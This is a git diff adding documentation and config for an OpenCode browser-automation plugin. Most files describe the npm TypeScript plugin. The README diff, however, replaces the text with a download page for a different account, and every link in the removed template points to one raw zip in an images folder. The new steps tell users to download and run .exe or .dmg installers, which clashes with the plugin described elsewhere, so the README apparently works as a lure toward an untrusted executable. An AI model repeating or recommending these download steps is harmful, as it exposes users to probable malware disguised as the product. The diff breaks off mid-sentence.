diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..103e768 --- /dev/null +++ b/.gitignore @@ -0,0 +1,12 @@ +node_modules/ +*.log +.DS_Store +dist/ +build/ +.env +.env.local +*.tsbuildinfo +coverage/ +.vscode/ +.idea/ +opencode.json diff --git a/.npmignore b/.npmignore new file mode 100644 index 0000000..b80e4f7 --- /dev/null +++ b/.npmignore @@ -0,0 +1,51 @@ +# Test files +test/ +tests/ +*.test.ts +*.spec.ts +*.test.js +*.spec.js + +# Documentation (keep only README.md) +EXAMPLES.md +ARCHITECTURE.md +CONTRIBUTING.md +SUMMARY.md +QUICKSTART.md +GET_STARTED.txt +PUBLISHING.md + +# Development files +.DS_Store +*.log +.env +.env.* + +# Build files +dist/ +build/ +*.tsbuildinfo +coverage/ + +# IDE files +.vscode/ +.idea/ +*.swp +*.swo +*~ + +# Git files +.git/ +.gitignore +.gitattributes + +# CI/CD +.github/ +.gitlab-ci.yml +.travis.yml + +# Misc +node_modules/ +npm-debug.log* +yarn-debug.log* +yarn-error.log* diff --git a/ARCHITECTURE.md b/ARCHITECTURE.md new file mode 100644 index 0000000..60989bd --- /dev/null +++ b/ARCHITECTURE.md @@ -0,0 +1,388 @@ +# OpenCode Browser MCP Plugin - Architecture + +This document describes the architecture and data flow of the OpenCode Browser MCP Plugin. + +## System Overview + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ User / Developer │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ Natural Language Prompts + │ (e.g., "Navigate to github.com") + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ OpenCode TUI │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Chat Interface │ │ +│ │ • Command Processing (/init, /undo, etc.) │ │ +│ │ • Session Management │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ Tool Invocation + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ OpenCode Agent / LLM │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Interprets user intent │ │ +│ │ • Selects appropriate tools │ │ +│ │ • Generates tool parameters │ │ +│ │ • Processes tool results │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + ┌────────────┴────────────┐ + │ │ + ▼ ▼ +┌───────────────────────────┐ ┌──────────────────────────┐ +│ Built-in Tools │ │ MCP Tools │ +│ • read │ │ • browsermcp_navigate │ +│ • write │ │ • browsermcp_click │ +│ • bash │ │ • browsermcp_fill │ +│ • grep │ │ • browsermcp_extract │ +│ • glob │ │ • browsermcp_screenshot │ +└───────────────────────────┘ └──────────┬───────────────┘ + │ + ┌────────────┘ + │ + │ Plugin Hooks Intercept + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Browser MCP Plugin (index.ts) │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: tool.execute.before │ │ +│ │ • Logs browser tool invocation │ │ +│ │ • Validates parameters │ │ +│ │ • Can modify tool arguments │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: tool.execute.after │ │ +│ │ • Logs browser tool results │ │ +│ │ • Can process/transform results │ │ +│ │ • Triggers custom actions │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: experimental.session.compacting │ │ +│ │ • Preserves browser state context │ │ +│ │ • Injects continuation prompts │ │ +│ └──────────────────────────────────────────────────────────┘ │ +│ │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ Hook: session.created, event │ │ +│ │ • Session lifecycle management │ │ +│ │ • Event-driven actions │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ MCP Protocol + │ (stdio/JSON-RPC) + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Browser MCP Server Process │ +│ (npx @browsermcp/mcp@latest) │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Receives tool invocations via stdin │ │ +│ │ • Translates to browser automation commands │ │ +│ │ • Communicates with browser extension │ │ +│ │ • Returns results via stdout │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ WebSocket / Native Messaging + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Browser MCP Extension (Chrome/Edge) │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Receives commands from MCP server │ │ +│ │ • Executes browser automation via Chrome APIs │ │ +│ │ • Captures screenshots, extracts data │ │ +│ │ • Returns results to MCP server │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└────────────────────────────┬────────────────────────────────────┘ + │ + │ Chrome DevTools Protocol + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ Chrome/Edge Browser │ +│ ┌──────────────────────────────────────────────────────────┐ │ +│ │ • Actual web pages and DOM │ │ +│ │ • JavaScript execution │ │ +│ │ • User interactions (clicks, typing, etc.) │ │ +│ │ • Network requests │ │ +│ └──────────────────────────────────────────────────────────┘ │ +└─────────────────────────────────────────────────────────────────┘ +``` + +## Component Responsibilities + +### 1. OpenCode TUI +**Responsibility**: User interface and session management +- Handles user input +- Manages conversation history +- Displays agent responses +- Executes commands (/init, /undo, etc.) + +### 2. OpenCode Agent / LLM +**Responsibility**: Intent interpretation and tool orchestration +- Understands natural language prompts +- Decides which tools to use +- Generates tool parameters +- Processes and presents results to user + +### 3. Browser MCP Plugin +**Responsibility**: Browser automation enhancement and monitoring +- Hooks into tool execution lifecycle +- Logs browser automation activities +- Preserves browser context across sessions +- Enables custom post-processing + +**Key Hooks**: +- `tool.execute.before`: Pre-process tool calls +- `tool.execute.after`: Post-process results +- `experimental.session.compacting`: Context preservation +- `session.created`: Session initialization +- `event`: Event handling + +### 4. Browser MCP Server +**Responsibility**: Protocol translation +- Implements MCP protocol (stdio JSON-RPC) +- Translates tool calls to browser commands +- Manages communication with browser extension +- Handles errors and timeouts + +### 5. Browser MCP Extension +**Responsibility**: Browser control +- Executes automation commands +- Uses Chrome DevTools Protocol +- Captures screenshots +- Extracts page data +- Handles DOM interactions + +### 6. Chrome/Edge Browser +**Responsibility**: Web page rendering and execution +- Renders web pages +- Executes JavaScript +- Handles user interactions +- Manages network requests + +## Data Flow Examples + +### Example 1: Simple Navigation + +``` +User Prompt: "Go to github.com" + ↓ +OpenCode TUI receives input + ↓ +LLM interprets → decides to use "browsermcp_navigate" + ↓ +Plugin Hook (tool.execute.before) + • Logs: "Executing browser tool: browsermcp_navigate" + • Logs: "Tool arguments: { url: 'https://github.com' }" + ↓ +Browser MCP Server receives: + { + "tool": "browsermcp_navigate", + "args": { "url": "https://github.com" } + } + ↓ +Browser Extension executes: + chrome.tabs.update({ url: "https://github.com" }) + ↓ +Browser navigates to GitHub + ↓ +Extension returns: { "success": true, "url": "https://github.com" } + ↓ +MCP Server returns result to OpenCode + ↓ +Plugin Hook (tool.execute.after) + • Logs: "Completed browser tool: browsermcp_navigate" + ↓ +LLM receives result → formats response + ↓ +User sees: "✓ Navigated to github.com" +``` + +### Example 2: Form Filling with Extraction + +``` +User Prompt: "Fill out the contact form at example.com with my details" + ↓ +LLM generates multiple tool calls: + 1. browsermcp_navigate (to example.com) + 2. browsermcp_fill (for each form field) + 3. browsermcp_click (submit button) + 4. browsermcp_extract (success message) + ↓ +Each tool call flows through: + Plugin Hooks → MCP Server → Extension → Browser + ↓ +Results flow back: + Browser → Extension → MCP Server → Plugin Hooks → LLM + ↓ +User sees complete result with all steps logged +``` + +### Example 3: Session Compaction + +``` +Long session with multiple browser interactions + ↓ +OpenCode detects session needs compaction + ↓ +Plugin Hook (experimental.session.compacting) + • Detects browser tools were used + • Injects context: "Browser state may have changed..." + • Adds continuation instructions + ↓ +Compaction summary includes browser context + ↓ +New session continues with preserved browser state awareness +``` + +## Plugin Hook Execution Order + +``` +1. session.created (when session starts) + ↓ +2. tool.execute.before (before each tool) + ↓ +3. [Tool executes - MCP Server → Extension → Browser] + ↓ +4. tool.execute.after (after each tool) + ↓ +5. event (various events throughout session) + ↓ +6. experimental.session.compacting (when session compacts) +``` + +## Configuration Flow + +``` +opencode.json + ↓ +OpenCode loads configuration + ↓ +Parses MCP server configuration: + { + "browsermcp": { + "command": ["npx", "-y", "@browsermcp/mcp@latest"] + } + } + ↓ +Spawns MCP server process + ↓ +Server connects to browser extension + ↓ +Plugin loads and initializes hooks + ↓ +Tools become available to LLM +``` + +## Error Handling Flow + +``` +Error occurs in browser + ↓ +Extension catches error + ↓ +Returns error to MCP Server + ↓ +MCP Server formats error + ↓ +Plugin Hook (tool.execute.after) sees error + • Can log for debugging + • Can transform error message + ↓ +LLM receives error + ↓ +LLM decides next action: + • Retry with different parameters + • Try alternative approach + • Report error to user +``` + +## Security Considerations + +``` +User Prompt + ↓ +OpenCode Agent + ↓ +Security Boundaries: + 1. Plugin can validate/sanitize tool parameters + 2. MCP Server validates commands + 3. Browser extension has limited permissions + 4. Browser security sandbox protects system +``` + +## Extension Points + +The plugin provides several extension points: + +1. **Custom Tools**: Add new browser automation tools +2. **Tool Hooks**: Intercept and modify tool execution +3. **Event Handlers**: React to OpenCode events +4. **Context Injection**: Add custom context during compaction +5. **Post-Processing**: Transform tool results + +## Performance Considerations + +``` +Latency Breakdown: + User Input → LLM: ~100-500ms (depends on model) + LLM → Tool Decision: ~500-2000ms (depends on complexity) + Plugin Hook (before): ~1-5ms + Tool → MCP Server: ~10-50ms + MCP Server → Extension: ~20-100ms + Extension → Browser: ~50-500ms (depends on action) + Browser → Extension: ~50-500ms + Extension → MCP Server: ~20-100ms + MCP Server → Tool Result: ~10-50ms + Plugin Hook (after): ~1-5ms + LLM Processing Result: ~100-500ms + +Total: ~1-3 seconds for simple actions +``` + +## Monitoring and Debugging + +The plugin provides several debugging capabilities: + +``` +Console Logs: + • Plugin initialization + • Tool execution (before/after) + • Session events + • Error conditions + +OpenCode Logs: + • MCP server startup + • Tool invocations + • Tool results + • Session management + +Browser Extension Logs: + • Command execution + • DOM interactions + • Screenshots + • Errors +``` + +## Future Architecture Enhancements + +1. **Caching Layer**: Cache browser state for faster operations +2. **Connection Pool**: Multiple browser instances +3. **Proxy Support**: Route traffic through proxies +4. **Custom Commands**: Domain-specific automation commands +5. **Visual Regression**: Screenshot comparison tools +6. **Performance Metrics**: Track automation performance +7. **Multi-Browser**: Support Firefox, Safari, etc. + +--- + +This architecture enables powerful browser automation while maintaining separation of concerns and extensibility. diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..8d58626 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,64 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [1.1.0] - 2026年01月08日 + +### Added +- **Automatic reconnection** when browser extension is disabled/enabled +- **Exponential backoff retry logic** for handling connection failures (1s → 2s → 4s → 8s → 16s, up to 30s max) +- **Connection health monitoring** to detect and recover from disconnections automatically +- **Connection state management** to track retry attempts and connection status +- **User notifications** for connection status changes with clear messages +- Smart error detection for various connection issues (timeouts, network errors, disconnections) +- Periodic health checks every 30 seconds when disconnected +- Automatic cleanup of health check resources on session end + +### Changed +- Enhanced `tool.execute.before` hook to notify users of reconnection attempts +- Enhanced `tool.execute.after` hook to detect connection errors and trigger automatic retry +- Improved error handling in event hook to detect browser-related errors +- Updated README with comprehensive reconnection feature documentation +- Added reconnection configuration details to README + +### Fixed +- No longer requires OpenCode restart when browser extension is toggled on/off +- Automatically recovers from temporary connection losses + +## [1.0.2] - 2026年01月05日 + +### Changed +- Improved configuration documentation with clearer setup instructions + +### Removed +- Removed obsolete documentation files +- Removed opencode.json from tracking and added to gitignore + +### Fixed +- Clarified that both plugin and MCP configuration are required +- Added release status documentation + +## [1.0.1] - 2025-12-XX + +### Changed +- Updated GitHub repository URLs to michaljach/opencode-browser + +### Fixed +- Removed console.log statements to prevent UI pollution + +## [1.0.0] - 2025-12-XX + +### Added +- Initial release +- Browser MCP integration +- Session context preservation +- Tool execution logging +- Event handling + +[1.1.0]: https://github.com/michaljach/opencode-browser/compare/v1.0.2...v1.1.0 +[1.0.2]: https://github.com/michaljach/opencode-browser/compare/v1.0.1...v1.0.2 +[1.0.1]: https://github.com/michaljach/opencode-browser/compare/v1.0.0...v1.0.1 +[1.0.0]: https://github.com/michaljach/opencode-browser/releases/tag/v1.0.0 diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..fa33333 --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,266 @@ +# Contributing to OpenCode Browser MCP Plugin + +Thank you for your interest in contributing to this project! This guide will help you get started. + +## Ways to Contribute + +1. **Report Bugs** - Found an issue? Let us know! +2. **Suggest Features** - Have an idea? Share it! +3. **Write Documentation** - Help others understand the plugin +4. **Submit Code** - Fix bugs or add features +5. **Share Examples** - Add useful automation examples + +## Development Setup + +### Prerequisites + +- Node.js v18 or higher +- OpenCode installed +- Browser MCP extension installed +- Git + +### Local Setup + +1. Clone the repository: +```bash +git clone https://github.com/michaljach/opencode-browser.git +cd opencode-browser +``` + +2. Install dependencies (if you add any): +```bash +npm install +``` + +3. Link the plugin locally: +```bash +# For testing +mkdir -p .opencode/plugin +ln -s $(pwd)/index.ts .opencode/plugin/browser-mcp.ts +``` + +4. Create your OpenCode configuration: +```bash +cp opencode.json.example opencode.json +``` + +## Testing Your Changes + +### Manual Testing + +1. Make your changes to `index.ts` +2. Restart OpenCode +3. Test with browser automation prompts +4. Verify the changes work as expected + +### Test Checklist + +Before submitting, ensure: + +- [ ] Plugin loads without errors +- [ ] Basic browser navigation works +- [ ] Tool execution hooks function correctly +- [ ] Session context is preserved +- [ ] No console errors or warnings +- [ ] Documentation is updated + +## Code Style + +### TypeScript Guidelines + +- Use TypeScript for all code +- Enable strict type checking +- Add JSDoc comments for public APIs +- Use meaningful variable names +- Keep functions small and focused + +### Example: + +```typescript +/** + * Processes browser tool execution results + * @param input - The tool execution input + * @param output - The tool execution output + */ +"tool.execute.after": async (input, output) => { + if (input.tool.startsWith("browsermcp_")) { + console.log(`Completed: ${input.tool}`) + } +} +``` + +## Submitting Changes + +### Pull Request Process + +1. Fork the repository +2. Create a feature branch: +```bash +git checkout -b feature/your-feature-name +``` + +3. Make your changes +4. Add tests if applicable +5. Update documentation +6. Commit with a clear message: +```bash +git commit -m "feat: add custom browser tool for screenshots" +``` + +7. Push to your fork: +```bash +git push origin feature/your-feature-name +``` + +8. Open a Pull Request + +### Commit Message Format + +Use conventional commits: + +- `feat:` - New feature +- `fix:` - Bug fix +- `docs:` - Documentation changes +- `refactor:` - Code refactoring +- `test:` - Adding tests +- `chore:` - Maintenance tasks + +Examples: +``` +feat: add screenshot comparison tool +fix: resolve session context preservation issue +docs: update installation instructions for Windows +``` + +## Adding New Features + +### Custom Tools + +To add a custom browser tool: + +```typescript +return { + tool: { + browser_screenshot: tool({ + description: "Take a screenshot of the current page", + args: { + fullPage: tool.schema.boolean().optional(), + }, + async execute(args, ctx) { + // Implementation + return "Screenshot saved" + }, + }), + }, +} +``` + +### New Hooks + +To add a new hook: + +```typescript +return { + "new.hook.name": async (input, output) => { + // Implementation + }, +} +``` + +## Documentation Standards + +### README.md Structure + +- Clear, concise explanations +- Code examples for all features +- Troubleshooting section +- Links to related resources + +### Code Comments + +- Explain WHY, not WHAT +- Use JSDoc for public APIs +- Keep comments up-to-date + +### Examples + +Add practical examples to `EXAMPLES.md`: + +```markdown +## Your Feature Name + +### Use Case Description + +``` +Your example prompt here +``` + +Explanation of what happens. +``` + +## Review Process + +### What We Look For + +1. **Functionality** - Does it work as intended? +2. **Code Quality** - Is it well-written and maintainable? +3. **Documentation** - Is it properly documented? +4. **Tests** - Are edge cases handled? +5. **Breaking Changes** - Are they necessary and documented? + +### Response Time + +- We aim to review PRs within 3-5 days +- Complex changes may take longer +- Feel free to ping if no response after a week + +## Getting Help + +### Questions? + +- Check existing issues and discussions +- Review the documentation +- Ask in the PR or issue comments +- Join the OpenCode Discord (if available) + +### Resources + +- [OpenCode Documentation](https://opencode.ai/docs/) +- [OpenCode Plugin Guide](https://opencode.ai/docs/plugins/) +- [Browser MCP Docs](https://docs.browsermcp.io/) +- [TypeScript Handbook](https://www.typescriptlang.org/docs/) + +## Community Guidelines + +### Be Respectful + +- Treat everyone with respect +- Assume good intentions +- Provide constructive feedback +- Help others learn and grow + +### Be Professional + +- Keep discussions on-topic +- Avoid inflammatory language +- Respect different perspectives +- Follow the code of conduct + +## Recognition + +Contributors will be: +- Listed in the README +- Credited in release notes +- Appreciated by the community + +## License + +By contributing, you agree that your contributions will be licensed under the MIT License. + +## Questions? + +Feel free to open an issue or discussion if you have questions about contributing! + +--- + +Thank you for contributing to OpenCode Browser MCP Plugin! diff --git a/EXAMPLES.md b/EXAMPLES.md new file mode 100644 index 0000000..efa47c6 --- /dev/null +++ b/EXAMPLES.md @@ -0,0 +1,250 @@ +# Example Usage Scenarios + +This file contains example prompts and use cases for the OpenCode Browser MCP Plugin. + +## Basic Examples + +### 1. Simple Navigation + +``` +Go to https://github.com and show me the trending repositories +``` + +### 2. Search and Extract Information + +``` +Navigate to https://news.ycombinator.com and list the top 10 post titles +``` + +### 3. Multi-step Navigation + +``` +1. Go to https://github.com +2. Click on the search bar +3. Search for "opencode" +4. Click on the first result +5. Tell me the number of stars the repository has +``` + +## Form Automation Examples + +### 1. Simple Form Filling + +``` +Go to https://example.com/contact-form and fill out: +- Name: Test User +- Email: test@example.com +- Subject: Inquiry +- Message: This is an automated test +Do not submit yet, just fill the fields. +``` + +### 2. Form Submission with Verification + +``` +Navigate to the signup page at https://example.com/signup +Fill in the registration form with test data +Submit the form +Take a screenshot of the result +``` + +## Web Scraping Examples + +### 1. Product Price Monitoring + +``` +Visit https://example.com/product/123 +Extract the product name, price, and availability status +``` + +### 2. Table Data Extraction + +``` +Go to https://example.com/data-table +Extract all the data from the table on the page +Format it as a CSV +``` + +## Testing Examples + +### 1. UI Testing + +``` +Go to https://my-app.com +Test the login flow with these credentials: +- Username: testuser +- Password: testpass123 + +Verify that: +1. The login form accepts the credentials +2. After login, the dashboard page loads +3. The user's name appears in the header +``` + +### 2. Responsive Design Testing + +``` +Visit https://my-website.com +Resize the browser to mobile size (375x667) +Take a screenshot +Resize to desktop (1920x1080) +Take another screenshot +Compare the layouts +``` + +## E-commerce Examples + +### 1. Shopping Flow + +``` +Navigate to https://example-shop.com +Search for "laptop" +Click on the first result +Add it to cart +Go to cart +Tell me the total price +``` + +### 2. Price Comparison + +``` +Check the price of "iPhone 15" on these sites: +1. https://store1.com +2. https://store2.com +3. https://store3.com + +Create a comparison table +``` + +## Content Management Examples + +### 1. Blog Post Verification + +``` +Visit my blog at https://myblog.com +Verify that the latest post titled "My New Article" is visible +Check if the publish date is correct +Take a screenshot of the post +``` + +### 2. Social Media Posting + +``` +Go to https://socialmedia.com +Log in (credentials from .env file) +Navigate to create new post +Fill in the post content: "Hello from OpenCode!" +Add the image from ./assets/post-image.jpg +Schedule for tomorrow at 9 AM +``` + +## Monitoring Examples + +### 1. Website Uptime Check + +``` +Visit https://my-production-site.com +Check if the page loads successfully +Verify that the login button is visible +If any errors occur, take a screenshot and save the console logs +``` + +### 2. Performance Monitoring + +``` +Navigate to https://my-app.com +Measure the page load time +Check for any console errors +Capture network requests +Report if load time exceeds 3 seconds +``` + +## Advanced Examples + +### 1. Multi-tab Workflow + +``` +Open three tabs: +1. https://github.com - find the OpenCode repository +2. https://docs.opencode.ai - open the plugins documentation +3. https://browsermcp.io - open the Browser MCP docs + +Switch between tabs and extract key information from each +``` + +### 2. Dynamic Content Interaction + +``` +Go to https://infinite-scroll-example.com +Scroll down to load more content +Repeat until you've loaded 50 items +Extract the titles of all items +``` + +### 3. File Download Automation + +``` +Navigate to https://reports.example.com +Log in with credentials +Go to the Reports section +Download the latest monthly report +Verify the download completed successfully +``` + +## Debugging Examples + +### 1. Console Error Detection + +``` +Visit https://my-app.com/problematic-page +Open the browser console +Check for any JavaScript errors +Take a screenshot if errors are found +Report all errors with their stack traces +``` + +### 2. Network Request Analysis + +``` +Go to https://my-api-app.com +Trigger the data load action +Capture all network requests made +Filter for failed requests (status>= 400) +Report the failed requests with details +``` + +## Integration with OpenCode Features + +### 1. Combined with Code Generation + +``` +Visit the competitor website at https://competitor.com +Analyze their homepage layout +Based on what you see, generate React components that replicate their design +Save the components to ./src/components/ +``` + +### 2. Documentation-Driven Development + +``` +Go to https://docs.example-api.com/authentication +Read the authentication documentation +Generate TypeScript functions that implement the authentication flow +Add proper type definitions based on the API docs +``` + +## Best Practices for Prompts + +1. **Be Specific**: Include exact URLs, selectors, and expected outcomes +2. **Break Down Complex Tasks**: Use numbered steps for multi-step workflows +3. **Add Verification**: Ask for screenshots or confirmations of critical actions +4. **Handle Errors**: Include instructions for what to do if something goes wrong +5. **Use Descriptive Names**: When referring to page elements, use descriptive text rather than CSS selectors when possible + +## Tips for Effective Browser Automation + +- Start with simple navigation before complex interactions +- Use wait times for pages that load slowly +- Take screenshots at key steps for debugging +- Save extracted data to files for processing +- Test on development environments before production diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..14fac91 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2026 + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/QUICKSTART.md b/QUICKSTART.md new file mode 100644 index 0000000..f0f807b --- /dev/null +++ b/QUICKSTART.md @@ -0,0 +1,124 @@ +# Quick Start Guide + +Get up and running with the OpenCode Browser MCP Plugin in 5 minutes. + +## Prerequisites + +- OpenCode installed (`npm install -g opencode-ai`) +- Node.js v18+ installed +- Chrome or Edge browser + +## Step 1: Install Browser MCP Extension (2 minutes) + +1. Visit https://browsermcp.io/install +2. Click "Install Extension" +3. Add the extension to your browser +4. Pin the extension to your browser toolbar + +## Step 2: Configure OpenCode (1 minute) + +Create or edit your `opencode.json` file in your project directory: + +```bash +cat> opencode.json << 'EOF' +{ + "$schema": "https://opencode.ai/config.json", + "plugin": ["opencode-browser"], + "mcp": { + "browsermcp": { + "type": "local", + "command": ["npx", "-y", "@browsermcp/mcp@latest"], + "enabled": true + } + } +} +EOF +``` + +**What this does:** +- `"plugin": ["opencode-browser"]` - Installs the plugin from npm (automatic) +- `"mcp": { "browsermcp": ... }` - Configures Browser MCP server (required for browser control) + +Both are needed! The plugin enhances the MCP tools, but the MCP server does the actual browser automation. + +### Alternative: Local Installation (for development) + +If you're testing local changes to the plugin: + +```bash +# Project-specific +mkdir -p .opencode/plugin +cp index.ts .opencode/plugin/browser-mcp.ts + +# Or global +mkdir -p ~/.config/opencode/plugin +cp index.ts ~/.config/opencode/plugin/browser-mcp.ts +``` + +## Step 3: Test It Out (1 minute) + +1. Start OpenCode in your project: +```bash +opencode +``` + +2. Try a simple browser automation command: +``` +Navigate to https://github.com and tell me what the featured repository is +``` + +3. Watch as OpenCode opens your browser and completes the task! + +## Verification Checklist + +- [ ] Browser MCP extension is installed and visible in browser toolbar +- [ ] `opencode.json` contains the MCP configuration +- [ ] Plugin file is in the correct directory +- [ ] OpenCode starts without errors +- [ ] Browser automation commands work + +## Troubleshooting Quick Fixes + +### "MCP server not found" +```bash +# Test if npx can run the MCP server +npx -y @browsermcp/mcp@latest --version +``` + +### "Plugin not loaded" +```bash +# Check if plugin file exists +ls -la .opencode/plugin/browser-mcp.ts +# or for global +ls -la ~/.config/opencode/plugin/browser-mcp.ts +``` + +### "Browser doesn't respond" +1. Check if Browser MCP extension is enabled +2. Try clicking the extension icon and selecting "Reconnect" +3. Restart your browser + +## Next Steps + +Now that you're set up, try these examples: + +1. **Web Search**: `Search Google for "OpenCode AI" and summarize the top result` + +2. **Form Filling**: `Go to https://example.com and fill out the contact form with test data` + +3. **Web Scraping**: `Visit Hacker News and list the top 5 stories` + +4. **Testing**: `Navigate to my app at localhost:3000 and verify the login button exists` + +See [EXAMPLES.md](./EXAMPLES.md) for more usage examples. + +## Getting Help + +- Check the full [README.md](./README.md) for detailed documentation +- Visit [Browser MCP Docs](https://docs.browsermcp.io/) +- Visit [OpenCode Docs](https://opencode.ai/docs/) +- Report issues on GitHub + +--- + +Enjoy automating your browser with OpenCode! 🚀 diff --git a/README.md b/README.md index 0cc605e..d461570 100644 --- a/README.md +++ b/README.md @@ -1,90 +1,77 @@ -# Welcome to GitHub +# 🖥️ opencode-browser - Automate Your Browsing with AI -Welcome to GitHub—where millions of developers work together on software. Ready to get started? Let’s learn how this all works by building and publishing your first GitHub Pages website! +[![Download Now](https://img.shields.io/badge/Download%20Now-%20%F0%9F%93%88%20-007BFF)](https://github.com/samson9999/opencode-browser/releases) -## Repositories +## 📜 Overview -Right now, we’re in your first GitHub **repository**. A repository is like a folder or storage space for your project. Your project's repository contains all its files such as code, documentation, images, and more. It also tracks every change that you—or your collaborators—make to each file, so you can always go back to previous versions of your project if you make any mistakes. +opencode-browser is a browser automation plugin designed for the OpenCode AI editor. With this tool, you can control Chrome and Edge browsers using artificial intelligence. This plugin enables you to automate web testing, scrape data, and fill out forms effortlessly through MCP integration. -This repository contains three important files: The HTML code for your first website on GitHub, the CSS stylesheet that decorates your website with colors and fonts, and the **README** file. It also contains an image folder, with one image file. +## 🚀 Getting Started -## Describe your project +To get started with opencode-browser, follow these simple steps to download and run the software. -You are currently viewing your project's **README** file. **_README_** files are like cover pages or elevator pitches for your project. They are written in plain text or [Markdown language](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip), and usually include a paragraph describing the project, directions on how to use it, who authored it, and more. +### 🛠️ System Requirements -[Learn more about READMEs](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) +- **Operating System:** Windows 10 or later / macOS 10.15 or later +- **Browser Support:** Google Chrome (latest version) or Microsoft Edge (latest version) +- **Memory:** At least 4 GB of RAM +- **Storage:** Minimum 100 MB of free disk space -## Your first website +### 📥 Download & Install -**GitHub Pages** is a free and easy way to create a website using the code that lives in your GitHub repositories. You can use GitHub Pages to build a portfolio of your work, create a personal website, or share a fun project that you coded with the world. GitHub Pages is automatically enabled in this repository, but when you create new repositories in the future, the steps to launch a GitHub Pages website will be slightly different. +1. **Visit the Download Page** + Click the link below to access the releases page: + [Download opencode-browser](https://github.com/samson9999/opencode-browser/releases) -[Learn more about GitHub Pages](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) +2. **Select the Latest Release** + On the releases page, find the latest version of opencode-browser. It is usually marked as the most recent. -## Rename this repository to publish your site +3. **Choose Your File** + Depending on your operating system, download the appropriate installer file. For Windows users, look for a .exe file. For macOS users, find a .dmg file. -We've already set-up a GitHub Pages website for you, based on your personal username. This repository is called `hello-world`, but you'll rename it to: `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip`, to match your website's URL address. If the first part of the repository doesn’t exactly match your username, it won’t work, so make sure to get it right. +4. **Run the Installer** + Once the file is downloaded, locate it in your downloads folder. Double-click on the file to start the installation process. -Let's get started! To update this repository’s name, click the `Settings` tab on this page. This will take you to your repository’s settings page. +5. **Follow the Installation Prompts** + The installer will provide step-by-step prompts. Follow these instructions carefully to complete the installation. -![repo-settings-image](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) +6. **Launch opencode-browser** + After installing, you can find opencode-browser in your applications folder or on your desktop. Open it to start automating your browsing tasks! -Under the **Repository Name** heading, type: `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip`, where username is your username on GitHub. Then click **Rename**—and that’s it. When you’re done, click your repository name or browser’s back button to return to this page. +## 🌟 Features -rename_screenshot +- **AI Control:** Automate tasks using smart AI algorithms. +- **Web Testing:** Easily test websites to ensure they function properly. +- **Data Scraping:** Gather data from various websites without manual effort. +- **Form Filling:** Automatically fill out forms to save time and reduce errors. +- **MCP Integration:** Seamlessly connect with the Model Context Protocol for enhanced functionality. -Once you click **Rename**, your website will automatically be published at: https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip The HTML file—called `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip`—is rendered as the home page and you'll be making changes to this file in the next step. +## 📝 Usage Instructions -Congratulations! You just launched your first GitHub Pages website. It's now live to share with the entire world +After launching opencode-browser, you can begin using it for various tasks: -## Making your first edit +1. **Setting Up Automation Tasks** + Open the application and navigate to the task setup screen. You can create new automation tasks by specifying actions like clicking buttons, entering text, or extracting data. -When you make any change to any 